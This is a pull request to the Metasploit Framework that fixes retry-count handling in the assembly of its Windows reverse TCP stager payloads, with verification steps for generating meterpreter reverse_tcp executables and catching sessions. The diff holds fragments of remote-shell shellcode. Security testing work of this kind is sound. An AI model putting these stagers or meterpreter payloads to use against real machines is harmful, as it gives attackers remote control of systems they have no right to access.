### PR TITLE
Fix #9090, honoring retry counts for x86/64 payloads

### DIFF
--- a/lib/msf/core/payload/windows/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -125,7 +125,8 @@ module Payload::Windows::ReverseTcp
         push 'ws2_'             ; ...
         push esp                ; Push a pointer to the "ws2_32" string on the stack.
         push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
-        call ebp                ; LoadLibraryA( "ws2_32" )
+        mov eax, ebp
+        call eax                ; LoadLibraryA( "ws2_32" )
 
         mov eax, 0x0190         ; EAX = sizeof( struct WSAData )
         sub esp, eax            ; alloc some space for the WSAData structure
@@ -298,7 +299,8 @@ module Payload::Windows::ReverseTcp
         dec [esp]               ; decrement the counter
 
         ; try again
-        jmp create_socket
+        jnz create_socket
+        jmp failure
       ^
     end
 

--- a/lib/msf/core/payload/windows/reverse_tcp_rc4.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp_rc4.rb
@@ -142,7 +142,8 @@ module Payload::Windows::ReverseTcpRc4
         dec [esp]               ; decrement the counter
 
         ; try again
-        jmp create_socket
+        jnz create_socket
+        jmp failure
       ^
     end
 

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1633,7 +1633,6 @@ require 'msf/core/exe/segment_appender'
   # target code there, setting an exception handler that calls ExitProcess
   # and finally executing the code.
   def self.win32_rwx_exec(code)
-
     stub_block = %Q^
     ; Input: The hash of the API to call and all its parameters must be pushed onto stack.
     ; Output: The return value from the API call will be in EAX.
@@ -1741,7 +1740,8 @@ require 'msf/core/exe/segment_appender'
     exitfunk:
       mov ebx, 0x0A2A1DE0    ; The EXITFUNK as specified by user...
       push 0x9DBD95A6        ; hash( "kernel32.dll", "GetVersion" )
-      call ebp               ; GetVersion(); (AL will = major version and AH will = minor version)
+      mov eax, ebp
+      call eax               ; GetVersion(); (AL will = major version and AH will = minor version)
       cmp al, byte 6         ; If we are not running on Windows Vista, 2008 or 7
       jl goodbye             ; Then just call the exit function...
       cmp bl, 0xE0           ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...


### PR DESCRIPTION
# Description

This fixes an issue for payloads not bailing correctly.

cc @bcook-r7 

Fix #9090

# Verification

- [x] Prepare a 32-bit Windows machine
- [x] Prepare a x64 Windows machine
- [x] Generate a windows/meterpreter/reverse_tcp as an executable
- [x] Generate a windows/x64/meterpreter/reverse_tcp as an executable
- [x] Make sure you get a session for windows/meterpreter/reverse_tcp
- [x] Make sure you get a session for windows/x64/meterpreter/reverse_tcp
- [x] Terminate your jobs so nothing should be listening
- [x] Try the payloads again. They should quit within seconds.